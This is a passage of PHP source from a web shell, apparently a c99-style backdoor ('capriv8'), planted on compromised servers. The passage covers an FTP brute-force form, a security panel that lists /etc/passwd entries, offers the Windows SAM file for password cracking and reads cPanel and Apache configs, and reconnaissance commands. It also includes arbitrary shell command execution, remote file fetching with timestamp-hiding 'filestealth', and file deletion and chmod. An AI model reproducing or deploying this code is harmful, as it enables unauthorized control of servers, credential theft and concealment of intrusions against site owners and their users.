  1442.     $logfile = $tmpdir_logs."ca_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
  1443.     $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
  1444.     echo "<form action=\"".$surl."\"><input type=hidden name=x value=\"ftpquickbrute\">".
  1445.          "Read first:</td><td><input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"></td></tr>".
  1446.          "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"> Users only with shell</td></tr>".
  1447.          "<tr><td></td><td><input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked>Logging</td></tr>".
  1448.          "<tr><td>Logging to file:</td><td><input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"></td></tr>".
  1449.          "<tr><td>Logging to e-mail:</td><td><input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"></td></tr>".
  1450.          "<tr><td colspan=2><input type=submit name=submit value=\"Brute\"></form>";
  1451.   }
  1452.   echo "</td></tr></table></center>";
  1453. }
  1454. }
  1455. if ($x == "d") {
  1456. if (!is_dir($d)) { echo "<center><b>$d is a not a Directory!</b></center>"; }
  1457. else {
  1458.   echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
  1459.   if (!$win) {
  1460.    echo "<tr><td><b>Owner/Group</b></td><td> ";
  1461.    $ow = posix_getpwuid(fileowner($d));
  1462.    $gr = posix_getgrgid(filegroup($d));
  1463.    $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
  1464.   }
  1465.   echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."x=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table>";
  1466. }
  1467. }
  1468. if ($x == "phpinfo") {@ob_clean(); phpinfo(); capriv8exit();}
  1469. if ($x == "security") {
  1470.   echo "<div class=barheader>.: Server Security Information :.</div>".
  1471.        "<table>".
  1472.        "<tr><td>Open Base Dir</td><td>".$hopenbasedir."</td></tr>";
  1473.   echo "<td>Password File</td><td>";
  1474.   if (!$win) {
  1475.     if ($nixpasswd) {
  1476.       if ($nixpasswd == 1) {$nixpasswd = 0;}
  1477.       echo "*nix /etc/passwd:<br>";
  1478.       if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
  1479.       if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
  1480.       echo "<form action=\"".$surl."\"><input type=hidden name=x value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
  1481.       $i = $nixpwd_s;
  1482.       while ($i < $nixpwd_e) {
  1483.         $uid = posix_getpwuid($i);
  1484.         if ($uid) {
  1485.           $uid["dir"] = "<a href=\"".$surl."x=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
  1486.           echo join(":",$uid)."<br>";
  1487.         }
  1488.         $i++;
  1489.       }
  1490.     }
  1491.     else {echo "<a href=\"".$surl."x=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a>";}
  1492.   }
  1493.   else {
  1494.     $v = $_SERVER["WINDIR"]."\repair\sam";
  1495.     if (file_get_contents($v)) {echo "<td colspan=2><div class=fxerrmsg>You can't crack Windows passwords(".$v.")</div></td></tr>"; }
  1496.     else {echo "You can crack Windows passwords. <a href=\"".$surl."x=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ?.</td></tr>";}
  1497.   }
  1498.   echo "</td></tr>";
  1499.   echo "<tr><td>Config Files</td><td>";
  1500.   if (!$win) {
  1501.     $v = array(
  1502.         array("User Domains","/etc/userdomains"),
  1503.         array("Cpanel Config","/var/cpanel/accounting.log"),
  1504.         array("Apache Config","/usr/local/apache/conf/httpd.conf"),
  1505.         array("Apache Config","/etc/httpd.conf"),
  1506.         array("Syslog Config","/etc/syslog.conf"),
  1507.         array("Message of The Day","/etc/motd"),
  1508.         array("Hosts","/etc/hosts")
  1509.     );
  1510.     $sep = "/";
  1511.   }
  1512.   else {
  1513.     $windir = $_SERVER["WINDIR"];
  1514.     $etcdir = $windir . "\system32\drivers\etc\\";
  1515.     $v = array(
  1516.         array("Hosts",$etcdir."hosts"),
  1517.         array("Local Network Map",$etcdir."networks"),
  1518.         array("LM Hosts",$etcdir."lmhosts.sam"),
  1519.     );
  1520.     $sep = "\\";
  1521.   }
  1522.   foreach ($v as $sec_arr) {
  1523.     $sec_f = substr(strrchr($sec_arr[1], $sep), 1);
  1524.     $sec_d = rtrim($sec_arr[1],$sec_f);
  1525.     $sec_full = $sec_d.$sec_f;
  1526.     $sec_d = rtrim($sec_d,$sep);
  1527.     if (file_get_contents($sec_full)) {
  1528.       echo " [ <a href=\"".$surl."x=f&f=$sec_f&d=".urlencode($sec_d)."&ft=txt\"><u><b>".$sec_arr[0]."</b></u></a> ] ";
  1529.     }
  1530.   }
  1531.   echo "</td></tr>";
  1532.  
  1533.   function displaysecinfo($name,$value) {
  1534.     if (!empty($value)) {
  1535.       echo "<tr><td>".$name."</td><td><pre>".wordwrap($value,100)."</pre></td></tr>";
  1536.     }
  1537.   }
  1538.   if (!$win) {
  1539.     displaysecinfo("OS Version",myshellexec("cat /proc/version"));
  1540.     displaysecinfo("Kernel Version",myshellexec("sysctl -a | grep version"));
  1541.     displaysecinfo("Distrib Name",myshellexec("cat /etc/issue.net"));
  1542.     displaysecinfo("Distrib Name (2)",myshellexec("cat /etc/*-realise"));
  1543.     displaysecinfo("CPU Info",myshellexec("cat /proc/cpuinfo"));
  1544.     displaysecinfo("RAM",myshellexec("free -m"));
  1545.     displaysecinfo("HDD Space",myshellexec("df -h"));
  1546.     displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
  1547.     displaysecinfo("Mount Options",myshellexec("cat /etc/fstab"));
  1548.     displaysecinfo("cURL installed?",myshellexec("which curl"));
  1549.     displaysecinfo("lynx installed?",myshellexec("which lynx"));
  1550.     displaysecinfo("links installed?",myshellexec("which links"));
  1551.     displaysecinfo("fetch installed?",myshellexec("which fetch"));
  1552.     displaysecinfo("GET installed?",myshellexec("which GET"));
  1553.     displaysecinfo("perl installed?",myshellexec("which perl"));
  1554.     displaysecinfo("Where is Apache?",myshellexec("whereis apache"));
  1555.     displaysecinfo("Where is perl?",myshellexec("whereis perl"));
  1556.     displaysecinfo("Locate proftpd.conf",myshellexec("locate proftpd.conf"));
  1557.     displaysecinfo("Locate httpd.conf",myshellexec("locate httpd.conf"));
  1558.     displaysecinfo("Locate my.conf",myshellexec("locate my.conf"));
  1559.     displaysecinfo("Locate psybnc.conf",myshellexec("locate psybnc.conf"));
  1560.   }
  1561.   else {
  1562.     displaysecinfo("OS Version",myshellexec("ver"));
  1563.     displaysecinfo("Account Settings",myshellexec("net accounts"));
  1564.   }
  1565.   echo "</table>\n";
  1566. }
  1567. if ($x == "mkfile") {
  1568. if ($mkfile != $d) {
  1569.   if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object already exists!";}
  1570.   elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied!";}
  1571.   else {$x = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
  1572. }
  1573. else {$x = $dspact = "ls";}
  1574.  
  1575. }
  1576. if ($x == "chmod") {
  1577.   $mode = fileperms($d.$f);
  1578.   if (!$mode) {echo "<b>Change file-mode with error:</b> can't get current value.";}
  1579.   else {
  1580.     $form = TRUE;
  1581.     if ($chmod_submit)
  1582.   {
  1583.    $octet = "0".base_convert(($chmod_o["r"]?1:0).($chmod_o["w"]?1:0).($chmod_o["x"]?1:0).($chmod_g["r"]?1:0).($chmod_g["w"]?1:0).($chmod_g["x"]?1:0).($chmod_w["r"]?1:0).($chmod_w["w"]?1:0).($chmod_w["x"]?1:0),2,8);
  1584.    if (chmod($d.$f,$octet)) {$x = "ls"; $form = FALSE; $err = "";}
  1585.    else {$err = "Can't chmod to ".$octet.".";}
  1586.   }
  1587.   if ($form)
  1588.   {
  1589.    $perms = parse_perms($mode);
  1590.    echo "<b>Changing file-mode (".$d.$f."), ".view_perms_color($d.$f)." (".substr(decoct(fileperms($d.$f)),-4,4).")</b><br>".($err?"<b>Error:</b> ".$err:"")."<form action=\"".$surl."\" method=POST><input type=hidden name=d value=\"".htmlspecialchars($d)."\"><input type=hidden name=f value=\"".htmlspecialchars($f)."\"><input type=hidden name=x value=chmod><table align=left width=300 border=0 cellspacing=0 cellpadding=5><tr><td><b>Owner</b><br><br><input type=checkbox NAME=chmod_o[r] value=1".($perms["o"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox name=chmod_o[w] value=1".($perms["o"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_o[x] value=1".($perms["o"]["x"]?" checked":"").">eXecute</td><td><b>Group</b><br><br><input type=checkbox NAME=chmod_g[r] value=1".($perms["g"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_g[w] value=1".($perms["g"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_g[x] value=1".($perms["g"]["x"]?" checked":"").">eXecute</font></td><td><b>World</b><br><br><input type=checkbox NAME=chmod_w[r] value=1".($perms["w"]["r"]?" checked":"").">&nbsp;Read<br><input type=checkbox NAME=chmod_w[w] value=1".($perms["w"]["w"]?" checked":"").">&nbsp;Write<br><input type=checkbox NAME=chmod_w[x] value=1".($perms["w"]["x"]?" checked":"").">eXecute</font></td></tr><tr><td><input type=submit name=chmod_submit value=\"Save\"></td></tr></table></form>";
  1591.   }
  1592. }
  1593. }
  1594. if ($x == "upload") {
  1595.   $uploadmess = "";
  1596.   $uploadpath = str_replace("\\",DIRECTORY_SEPARATOR,$uploadpath);
  1597.   if (empty($uploadpath)) {$uploadpath = $d;}
  1598.   elseif (substr($uploadpath,-1) != DIRECTORY_SEPARATOR) {$uploadpath .= DIRECTORY_SEPARATOR;}
  1599.   if (!empty($submit)) {
  1600.     global $_FILES;
  1601.     $uploadfile = $_FILES["uploadfile"];
  1602.     if (!empty($uploadfile["tmp_name"])) {
  1603.       if (empty($uploadfilename)) {$destin = $uploadfile["name"];}
  1604.       else {$destin = $userfilename;}
  1605.       if (!move_uploaded_file($uploadfile["tmp_name"],$uploadpath.$destin)) {
  1606.         $uploadmess .= "Error uploading file ".$uploadfile["name"]." (can't copy \"".$uploadfile["tmp_name"]."\" to \"".$uploadpath.$destin."\"!<br>";
  1607.       }
  1608.       else { $uploadmess .= "File uploaded successfully!<br>".$uploadpath.$destin; }
  1609.     }
  1610.     elseif (!empty($uploadurl)) {
  1611.       if (!empty($uploadfilename)) {$destin = $uploadfilename;}
  1612.       else {
  1613.         $destin = explode("/",$destin);
  1614.         $destin = $destin[count($destin)-1];
  1615.         if (empty($destin)) {
  1616.           $i = 0;
  1617.           $b = "";
  1618.           while(file_exists($uploadpath.$destin)) {
  1619.             if ($i > 0) {$b = "_".$i;}
  1620.             $destin = "upload".$b;
  1621.             $i++;
  1622.           }
  1623.         }
  1624.       }
  1625.       if ((!eregi("http://",$uploadurl)) and (!eregi("https://",$uploadurl)) and (!eregi("ftp://",$uploadurl))) {echo "<b>Incorrect URL!</b>";}
  1626.       else {
  1627.         $st = getmicrotime();
  1628.         $content = @file_get_contents($uploadurl);
  1629.         $dt = round(getmicrotime()-$st,4);
  1630.         if (!$content) {$uploadmess .=  "Can't download file!";}
  1631.         else {
  1632.           if ($filestealth) {$stat = stat($uploadpath.$destin);}
  1633.           $fp = fopen($uploadpath.$destin,"w");
  1634.           if (!$fp) {$uploadmess .= "Error writing to file ".htmlspecialchars($destin)."!<br>";}
  1635.           else {
  1636.             fwrite($fp,$content,strlen($content));
  1637.             fclose($fp);
  1638.             if ($filestealth) {touch($uploadpath.$destin,$stat[9],$stat[8]);}
  1639.             $uploadmess .= "File saved from ".$uploadurl." !";
  1640.           }
  1641.         }
  1642.       }
  1643.     }
  1644.     else { echo "No file to upload!"; }
  1645.   }
  1646.   if ($miniform) {
  1647.     echo "<b>".$uploadmess."</b>";
  1648.     $x = "ls";
  1649.   }
  1650.   else {
  1651.     echo "<table><tr><td colspan=2 class=barheader>".
  1652.          ".: File Upload :.</td>".
  1653.          "<td colspan=2>".$uploadmess."</td></tr>".
  1654.          "<tr><td><form enctype=\"multipart/form-data\" action=\"".$surl."x=upload&d=".urlencode($d)."\" method=POST>".
  1655.          "From Your Computer:</td><td><input name=\"uploadfile\" type=\"file\"></td></tr>".
  1656.          "<tr><td>From URL:</td><td><input name=\"uploadurl\" type=\"text\" value=\"".htmlspecialchars($uploadurl)."\" size=\"70\"></td></tr>".
  1657.          "<tr><td>Target Directory:</td><td><input name=\"uploadpath\" size=\"70\" value=\"".$dispd."\"></td></tr>".
  1658.          "<tr><td>Target File Name:</td><td><input name=uploadfilename size=25></td></tr>".
  1659.          "<tr><td></td><td><input type=checkbox name=uploadautoname value=1 id=df4> Convert file name to lowercase</td></tr>".
  1660.          "<tr><td></td><td><input type=submit name=submit value=\"Upload\">".
  1661.          "</form></td></tr></table>";
  1662.   }
  1663. }
  1664. if ($x == "delete") {
  1665.   $delerr = "";
  1666.   foreach ($actbox as $v) {
  1667.     $result = FALSE;
  1668.     $result = fs_rmobj($v);
  1669.     if (!$result) {$delerr .= "Can't delete ".htmlspecialchars($v)."<br>";}
  1670.   }
  1671.   if (!empty($delerr)) {echo "<b>Deleting with errors:</b><br>".$delerr;}
  1672.   $x = "ls";
  1673. }
  1674. if (!$usefsbuff) {
  1675.   if (($x == "paste") or ($x == "copy") or ($x == "cut") or ($x == "unselect")) {echo "<center><b>Sorry, buffer is disabled. For enable, set directive \"\$usefsbuff\" as TRUE.</center>";}
  1676. }
  1677. else {
  1678.   if ($x == "copy") {$err = ""; $sess_data["copy"] = array_merge($sess_data["copy"],$actbox); ca_sess_put($sess_data); $x = "ls"; }
  1679.   elseif ($x == "cut") {$sess_data["cut"] = array_merge($sess_data["cut"],$actbox); ca_sess_put($sess_data); $x = "ls";}
  1680.   elseif ($x == "unselect") {foreach ($sess_data["copy"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["copy"][$k]);}} foreach ($sess_data["cut"] as $k=>$v) {if (in_array($v,$actbox)) {unset($sess_data["cut"][$k]);}} ca_sess_put($sess_data); $x = "ls";}
  1681.   if ($actemptybuff) {$sess_data["copy"] = $sess_data["cut"] = array(); ca_sess_put($sess_data);}
  1682.   elseif ($actpastebuff) {
  1683.     $psterr = "";
  1684.     foreach($sess_data["copy"] as $k=>$v) {
  1685.       $to = $d.basename($v);
  1686.       if (!fs_copy_obj($v,$to)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  1687.       if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1688.     }
  1689.     foreach($sess_data["cut"] as $k=>$v) {
  1690.       $to = $d.basename($v);
  1691.       if (!fs_move_obj($v,$to)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  1692.       unset($sess_data["cut"][$k]);
  1693.     }
  1694.     ca_sess_put($sess_data);
  1695.     if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  1696.     $x = "ls";
  1697.   }
  1698.   elseif ($actarcbuff) {
  1699.     $arcerr = "";
  1700.     if (substr($actarcbuff_path,-7,7) == ".tar.gz") {$ext = ".tar.gz";}
  1701.     else {$ext = ".tar.gz";}
  1702.     if ($ext == ".tar.gz") {$cmdline = "tar cfzv";}
  1703.     $cmdline .= " ".$actarcbuff_path;
  1704.     $objects = array_merge($sess_data["copy"],$sess_data["cut"]);
  1705.     foreach($objects as $v) {
  1706.       $v = str_replace("\\",DIRECTORY_SEPARATOR,$v);
  1707.       if (substr($v,0,strlen($d)) == $d) {$v = basename($v);}
  1708.       if (is_dir($v)) {
  1709.         if (substr($v,-1) != DIRECTORY_SEPARATOR) {$v .= DIRECTORY_SEPARATOR;}
  1710.         $v .= "*";
  1711.       }
  1712.       $cmdline .= " ".$v;
  1713.     }
  1714.     $tmp = realpath(".");
  1715.     chdir($d);
  1716.     $ret = myshellexec($cmdline);
  1717.     chdir($tmp);
  1718.     if (empty($ret)) {$arcerr .= "Can't call archivator (".htmlspecialchars(str2mini($cmdline,60)).")!<br>";}
  1719.     $ret = str_replace("\r\n","\n",$ret);
  1720.     $ret = explode("\n",$ret);
  1721.     if ($copy_unset) {foreach($sess_data["copy"] as $k=>$v) {unset($sess_data["copy"][$k]);}}
  1722.     foreach($sess_data["cut"] as $k=>$v) {
  1723.       if (in_array($v,$ret)) {fs_rmobj($v);}
  1724.       unset($sess_data["cut"][$k]);
  1725.     }
  1726.     ca_sess_put($sess_data);
  1727.     if (!empty($arcerr)) {echo "<b>Archivation errors:</b><br>".$arcerr;}
  1728.     $x = "ls";
  1729.   }
  1730.   elseif ($actpastebuff) {
  1731.     $psterr = "";
  1732.     foreach($sess_data["copy"] as $k=>$v) {
  1733.       $to = $d.basename($v);
  1734.       if (!fs_copy_obj($v,$d)) {$psterr .= "Can't copy ".$v." to ".$to."!<br>";}
  1735.       if ($copy_unset) {unset($sess_data["copy"][$k]);}
  1736.     }
  1737.     foreach($sess_data["cut"] as $k=>$v) {
  1738.       $to = $d.basename($v);
  1739.       if (!fs_move_obj($v,$d)) {$psterr .= "Can't move ".$v." to ".$to."!<br>";}
  1740.       unset($sess_data["cut"][$k]);
  1741.     }
  1742.     ca_sess_put($sess_data);
  1743.     if (!empty($psterr)) {echo "<b>Pasting with errors:</b><br>".$psterr;}
  1744.     $x = "ls";
  1745.   }
  1746. }
  1747. if ($x == "cmd") {
  1748.   @chdir($chdir);
  1749.   if (!empty($submit)) {
  1750.     echo "<div class=barheader>.: Result of Command Execution :.</div>";
  1751.     $olddir = realpath(".");
  1752.     @chdir($d);
  1753.     $ret = myshellexec($cmd);
  1754.     $ret = convert_cyr_string($ret,"d","w");
  1755.     $command = htmlspecialchars($cmd);
  1756.     if ($cmd_txt) {
  1757.       $rows = count(explode("\r\n",$ret))+1;
  1758.       if ($rows < 10) {$rows = 10; }
  1759.       if ($msie) { $cols = 113; }
  1760.       else { $cols = 117;}
  1761.       echo "<div align=left><pre>".htmlspecialchars($ret)."</pre></div>";
  1762.     }
  1763.     else {echo $ret."<br>";}
  1764.     @chdir($olddir);
  1765.   }
  1766.   else {
  1767.     echo "<b>Command Execution</b>";
  1768.     if (empty($cmd_txt)) {$cmd_txt = TRUE;}
  1769.   }
  1770. }
  1771. if ($x == "ls") {
  1772.   if (count($ls_arr) > 0) { $list = $ls_arr; }
  1773.   else {
  1774.     $list = array();
  1775.     if ($h = @opendir($d)) {
  1776.       while (($o = readdir($h)) !== FALSE) {$list[] = $d.$o;}
  1777.       closedir($h);
  1778.     }
  1779.   }
  1780.   if (count($list) == 0) { echo "<div class=fxerrmsg>Can't open folder (".htmlspecialchars($d).")!</div>";}
  1781.   else {
  1782.     $objects = array();
  1783.     $vd = "f";
  1784.     if ($vd == "f") {
  1785.       $objects["head"] = array();
  1786.       $objects["folders"] = array();
  1787.       $objects["links"] = array();
  1788.       $objects["files"] = array();
  1789.       foreach ($list as $v) {
  1790.         $o = basename($v);
  1791.         $row = array();
  1792.         if ($o == ".") {$row[] = $d.$o; $row[] = "CURDIR";}
  1793.         elseif ($o == "..") {$row[] = $d.$o; $row[] = "UPDIR";}
  1794.         elseif (is_dir($v)) {
  1795.           if (is_link($v)) {$type = "LINK";}
  1796.           else {$type = "DIR";}
  1797.           $row[] = $v;
  1798.           $row[] = $type;
  1799.         }
  1800.         elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);}
  1801.         $row[] = filemtime($v);
  1802.         if (!$win) {
  1803.           $ow = posix_getpwuid(fileowner($v));
  1804.           $gr = posix_getgrgid(filegroup($v));
  1805.           $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v));
  1806.         }
  1807.         $row[] = fileperms($v);
  1808.         if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;}
  1809.         elseif (is_link($v)) {$objects["links"][] = $row;}
  1810.         elseif (is_dir($v)) {$objects["folders"][] = $row;}
  1811.         elseif (is_file($v)) {$objects["files"][] = $row;}
  1812.         $i++;
  1813.       }
  1814.       $row = array();
  1815.       $row[] = "<b>Name</b>";
  1816.       $row[] = "<b>Size</b>";
  1817.       $row[] = "<b>Date Modified</b>";
  1818.       if (!$win) {$row[] = "<b>Owner/Group</b>";}
  1819.       $row[] = "<b>Perms</b>";
  1820.       $row[] = "<b>Action</b>";
  1821.       $parsesort = parsesort($sort);
  1822.       $sort = $parsesort[0].$parsesort[1];
  1823.       $k = $parsesort[0];
  1824.       if ($parsesort[1] != "a") {$parsesort[1] = "d";}
  1825.       $y = " <a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&sort=".$k.($parsesort[1] == "a"?"d":"a")."\">";
  1826.       $y .= "<img src=\"".$surl."x=img&img=sort_".($sort[1] == "a"?"asc":"desc")."\" height=\"9\" width=\"14\" alt=\"".($parsesort[1] == "a"?"Asc.":"Desc")."\" border=\"0\"></a>";
  1827.       $row[$k] .= $y;
  1828.       for($i=0;$i<count($row)-1;$i++) {
  1829.         if ($i != $k) {$row[$i] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode($d)."&sort=".$i.$parsesort[1]."\">".$row[$i]."</a>";}
  1830.       }
  1831.       $v = $parsesort[0];
  1832.       usort($objects["folders"], "tabsort");
  1833.       usort($objects["links"], "tabsort");
  1834.       usort($objects["files"], "tabsort");
  1835.       if ($parsesort[1] == "d") {
  1836.         $objects["folders"] = array_reverse($objects["folders"]);
  1837.         $objects["files"] = array_reverse($objects["files"]);
  1838.       }
  1839.       $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]);
  1840.       $tab = array();
  1841.       $tab["cols"] = array($row);
  1842.       $tab["head"] = array();
  1843.       $tab["folders"] = array();
  1844.       $tab["links"] = array();
  1845.       $tab["files"] = array();
  1846.       $i = 0;
  1847.       foreach ($objects as $a) {
  1848.         $v = $a[0];
  1849.         $o = basename($v);
  1850.         $dir = dirname($v);
  1851.         if ($disp_fullpath) {$disppath = $v;}
  1852.         else {$disppath = $o;}
  1853.         $disppath = str2mini($disppath,60);
  1854.         if (in_array($v,$sess_data["cut"])) {$disppath = "<strike>".$disppath."</strike>";}
  1855.         elseif (in_array($v,$sess_data["copy"])) {$disppath = "<u>".$disppath."</u>";}
  1856.         foreach ($regxp_highlight as $r) {
  1857.           if (ereg($r[0],$o)) {
  1858.             if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; capriv8exit();}
  1859.             else {
  1860.               $r[1] = round($r[1]);
  1861.               $isdir = is_dir($v);
  1862.               if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) {
  1863.                 if (empty($r[2])) {$r[2] = "<b>"; $r[3] = "</b>";}
  1864.                 $disppath = $r[2].$disppath.$r[3];
  1865.                 if ($r[4]) {break;}
  1866.               }
  1867.             }
  1868.           }
  1869.         }
  1870.         $uo = urlencode($o);
  1871.         $ud = urlencode($dir);
  1872.         $uv = urlencode($v);
  1873.         $row = array();
  1874.         if ($o == ".") {
  1875.           $row[] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."x=img&img=small_dir\" border=\"0\">&nbsp;".$o."</a>";
  1876.           $row[] = "CURDIR";
  1877.         }
  1878.         elseif ($o == "..") {
  1879.           $row[] = "<a href=\"".$surl."x=".$dspact."&d=".urlencode(realpath($d.$o))."&sort=".$sort."\"><img src=\"".$surl."x=img&img=ext_lnk\" border=\"0\">&nbsp;".$o."</a>";
  1880.           $row[] = "UPDIR";
  1881.         }
  1882.         elseif (is_dir($v)) {
  1883.           if (is_link($v)) {
  1884.             $disppath .= " => ".readlink($v);
  1885.             $type = "LINK";
  1886.             $row[] = "<a href=\"".$surl."x=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."x=img&img=ext_lnk\" border=\"0\">&nbsp;[".$disppath."]</a>";
  1887.           }
  1888.           else {
  1889.             $type = "DIR";
  1890.             $row[] =  "<a href=\"".$surl."x=ls&d=".$uv."&sort=".$sort."\"><img src=\"".$surl."x=img&img=small_dir\" border=\"0\">&nbsp;[".$disppath."]</a>";
  1891.           }
  1892.           $row[] = $type;
  1893.         }
  1894.         elseif(is_file($v)) {
  1895.           $ext = explode(".",$o);
  1896.           $c = count($ext)-1;
  1897.           $ext = $ext[$c];
  1898.           $ext = strtolower($ext);
  1899.           $row[] =  "<a href=\"".$surl."x=f&f=".$uo."&d=".$ud."\"><img src=\"".$surl."x=img&img=ext_".$ext."\" border=\"0\">&nbsp;".$disppath."</a>";
  1900.           $row[] = view_size($a[1]);
  1901.         }
  1902.         $row[] = date("d.m.Y H:i:s",$a[2]);
  1903.         if (!$win) {$row[] = $a[3];}
  1904.         $row[] = "<a href=\"".$surl."x=chmod&f=".$uo."&d=".$ud."\"><b>".view_perms_color($v)."</b></a>";
  1905.         if ($o == ".") {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" onclick=\"ls_reverse_all();\">"; $i--;}
  1906.         else {$checkbox = "<input type=\"checkbox\" name=\"actbox[]\" id=\"actbox".$i."\" value=\"".htmlspecialchars($v)."\">";}
  1907.         if (is_dir($v)) {$row[] = "<a href=\"".$surl."x=d&d=".$uv."\"><img src=\"".$surl."x=img&img=ext_diz\" alt=\"Info\" border=\"0\"></a>&nbsp;".$checkbox;}
  1908.         else {$row[] = "<a href=\"".$surl."x=f&f=".$uo."&ft=info&d=".$ud."\"><img src=\"".$surl."x=img&img=ext_diz\" alt=\"Info\" height=\"16\" width=\"16\" border=\"0\"></a>&nbsp;<a href=\"".$surl."x=f&f=".$uo."&ft=edit&d=".$ud."\"><img src=\"".$surl."x=img&img=change\" alt=\"Change\" height=\"16\" width=\"19\" border=\"0\"></a>&nbsp;<a href=\"".$surl."x=f&f=".$uo."&ft=download&d=".$ud."\"><img src=\"".$surl."x=img&img=download\" alt=\"Download\" border=\"0\"></a>&nbsp;".$checkbox;}
  1909.         if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;}
  1910.         elseif (is_link($v)) {$tab["links"][] = $row;}
  1911.         elseif (is_dir($v)) {$tab["folders"][] = $row;}
  1912.         elseif (is_file($v)) {$tab["files"][] = $row;}
  1913.         $i++;
  1914.       }
  1915.     }
  1916.     $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]);
  1917.     echo "<div class=barheader>.: ";
  1918.     if (!empty($fx_infohead)) { echo $fx_infohead; }
  1919.     else { echo "Directory (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders)"; }
  1920.     echo " :.</div>\n";
  1921.     echo "<form action=\"".$surl."\" method=POST name=\"ls_form\"><input type=hidden name=x value=\"".$dspact."\"><input type=hidden name=d value=".$d.">".
  1922.          "<table class=explorer>";
  1923.     foreach($table as $row) {
  1924.       echo "<tr>";
  1925.       foreach($row as $v) {echo "<td>".$v."</td>";}
  1926.       echo "</tr>\r\n";
  1927.     }
  1928.     echo "</table>".
  1929.          "<script>".
  1930.          "function ls_setcheckboxall(status) {".
  1931.          " var id = 1; var num = ".(count($table)-2).";".
  1932.          " while (id <= num) { document.getElementById('actbox'+id).checked = status; id++; }".
  1933.          "}".
  1934.          "function ls_reverse_all() {".
  1935.          " var id = 1; var num = ".(count($table)-2).";".
  1936.          " while (id <= num) { document.getElementById('actbox'+id).checked = !document.getElementById('actbox'+id).checked; id++; }".
  1937.          "}".
  1938.          "</script>".
  1939.          "<div align=\"right\">".
  1940.          "<input type=\"button\" onclick=\"ls_setcheckboxall(true);\" value=\"Select all\">&nbsp;&nbsp;<input type=\"button\" onclick=\"ls_setcheckboxall(false);\" value=\"Unselect all\">".
  1941.          "<img src=\"".$surl."x=img&img=arrow_ltr\" border=\"0\">";
  1942.     if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) {
  1943.       echo "<input type=submit name=actarcbuff value=\"Pack buffer to archive\">&nbsp;<input type=\"text\" name=\"actarcbuff_path\" value=\"fx_archive_".substr(md5(rand(1,1000).rand(1,1000)),0,5).".tar.gz\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actpastebuff\" value=\"Paste\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=submit name=\"actemptybuff\" value=\"Empty buffer\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;";
  1944.     }
  1945.     echo "<select name=x><option value=\"".$x."\">With selected:</option>";
  1946.     echo "<option value=delete".($dspact == "delete"?" selected":"").">Delete</option>";
